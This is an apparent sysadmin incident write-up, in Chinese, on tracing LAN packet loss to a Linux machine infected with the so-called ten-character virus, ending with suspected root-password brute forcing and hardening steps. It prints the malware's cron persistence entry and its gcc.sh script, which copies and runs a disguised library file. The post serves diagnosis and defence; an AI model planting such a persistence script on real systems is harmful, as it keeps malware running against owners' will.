記一次Linux系統被入侵的過程

1. 前期現象

前期現象，宋組那邊反應開發環境192.161.14.98這台機器通過公網下載文件，很慢，ping百度丟包嚴重。因為這台機器是通過樓下adsl撥號上網，於是連上去ping該網段網關(192.168.3.1)，發現內網都丟包。

2.問題排查

2.1前期排查

2.1.1排查是不是14.98這台機器的問題

為排查是不是192.161.14.98這台機器的問題，通過發現抓包發現。Arp包、和廣播包都比較比較多，考慮到是不是DOS攻擊，然后在登錄adsl開啟ICMP泛洪、SYN泛洪、ARP攻擊相關策略，重啟adsl。在14.98這台機器上，ping 網關192.168.3.1，發現過一會兒丟包依然存在。為排除是不是14.98這台機器的問題，選擇stage環境6.21這台機（該機器也是通過adsl上網的有一個192.168.3.0網段的IP）做測試，通過這台機器ping網關（192.168.3.1），發現丟包依然存在。

2.1.2排查可能不是14.98這台機器的問題

於是，就考慮到可能不是14.98這台機器的問題,考慮可能是通過adsl上網下載的機器占用帶寬的問題（因為這個問題，在以前也遇到過，通過改內網網段，問題就解決了。）於是將192.168.3.0/24改成192.168.2.0/24，並修改了14.98和stage6.21這台機器的相應的能夠上公網的ip。發現丟包現象停止。基本確認是有機器占用帶寬導致這次問題。

2.2中期排查

為排除以后在出現此問題，影響工作。決定綁定主機mac地址，限制p2p流量，便於以后快速定位問題。

2.2.1開啟dhcp服務器，定位通過adsl上網的主機都是哪些IP哪些mac地址，並配置mac過濾策略。如下圖所示

 

2.2.2通過逐一排查定位主機

在切換策略的時候，定位到14.158這台機器有重大嫌疑。如果允許該主機上外網，丟包現象存在，如果限制該主機上網，丟包現象消失。

2.3后期排查

2.3.1通過抓包發現該主機arp包、廣播包太多說明可能存在問題

2.3.2top命令查看異常進程

 

2.3.3查看該異常的連接

當時忘截圖了，發現該進程的一個端口有一個法國IP連接存於established狀態。

2.3.4查看該進程執行文件

 

2.3.4殺死該進程斷網

發現該進程有死爾復生的功能，但是斷網之后對網絡帶寬影響消失。斷定可能本機有定時任務。

2.3.5排查定時任務

[root@www ~]# cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

 

# For details see man 4 crontabs

 

# Example of job definition:

# .---------------- minute (0 - 59)

# |  .------------- hour (0 - 23)

# |  |  .---------- day of month (1 - 31)

# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...

# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# |  |  |  |  |

# *  *  *  *  * user-name command to be executed

 

*/3 * * * * root /etc/cron.hourly/gcc.sh

2.3.6定位循環執行的病毒體

[root@www ~]# cat  /etc/cron.hourly/gcc.sh

#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin

for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done

cp /lib/libudev.so /lib/libudev.so.6

/lib/libudev.so.6

通過百度查出此病毒為臭名昭著的“十字符病毒”

2.3.7十字符病毒詳解及其處理辦法

請參考下面鏈接http://blog.csdn.net/fgf00/article/details/51388422

2.3.8查看病毒體源碼

 

3.追蹤被黑的原因

3.1查看最近登錄本台機器的未能看到近期成功登錄本機的記錄懷疑已被抹除痕跡

3.2懷疑當初官網測試的時候，由於root密碼太弱被暴力破解，注入此病毒。

3.3具體原因還需進一步研究。

4.造成危害

占用系統資源和占用帶寬，導致局域網丟包嚴重。

5.解決辦法

5.1殺死病毒請參考如下鏈接

http://blog.csdn.net/fgf00/article/details/51388422

 

5.2防范措施

5.2.1禁用root直接登錄

5.2.2設置登錄錯誤次數限定

5.2.3安裝prtg軟件，監控異常流量，便於快速定位問題